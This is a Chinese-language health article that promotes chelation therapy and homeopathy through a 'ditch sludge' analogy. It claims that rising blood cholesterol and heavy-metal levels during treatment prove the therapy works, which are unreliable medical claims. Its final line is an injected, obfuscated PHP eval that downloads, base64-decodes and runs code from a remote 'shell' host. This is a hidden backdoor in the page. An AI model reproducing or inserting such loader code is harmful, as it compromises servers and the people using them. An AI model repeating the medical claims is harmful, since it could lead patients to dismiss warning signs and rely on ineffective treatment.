收藏本站
水溝汙泥理論 列印 E-mail
        曾有臨床醫師以血清中的膽固醇、三酸甘油脂…等濃度,作為評估螯合療法是否能改善血管硬化的指標,但這是正確的嗎?

        試想,我們常見溝壁覆蓋著厚厚汙泥的水溝,它的水是清的;當我們用鏟子剷除污泥的當時,水溝的水必然會變成混濁的狀態,至於何時會恢復清澈,則有許多不同的變數!例如清除的時間與程度、水流速度、是否有人持續丟棄廢棄物…等,可是只要剷除過污泥,待水清澈後,溝壁上的阻塞物必然會變少。
        同理,血壓、血糖、膽固醇、三酸甘油脂及有毒重金屬…等均是造成動脈硬化的原因之一,也就如同是覆蓋溝壁的污泥。患者在施行螯合療法時,因為螯合療法正將血液中有毒的重金屬清除,所以會造成血液中膽固醇、三酸甘油脂及有毒重金屬…等濃度「短暫性」的增加,甚而有些人會因血中短暫性有毒重金屬濃度增加,造成「短暫性」重金屬微量中毒現象,並有不同的臨床症狀出現。所以在治療過程中不宜以血中膽固醇、三酸甘油脂……來作為治療是否有效的指標,而應以患者臨床症狀改善與否做為評估標準。

        治療過程中,短暫性出現的症狀,必定是患者平常有的症狀,表示患者平常這些症狀多是因為這些有毒重金屬在體內累積所造成。就如同汙泥是造成水溝內水混濁的原因。如何能讓這些有毒重金屬快速沉澱下來,快速改善患者的臨床症狀,此時,最佳的選擇就是「順勢療法」。順勢療法製剤可以快速平衡體內短暫微量有毒重金屬污染現象,快速改善短暫污染所造成的臨床症狀。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));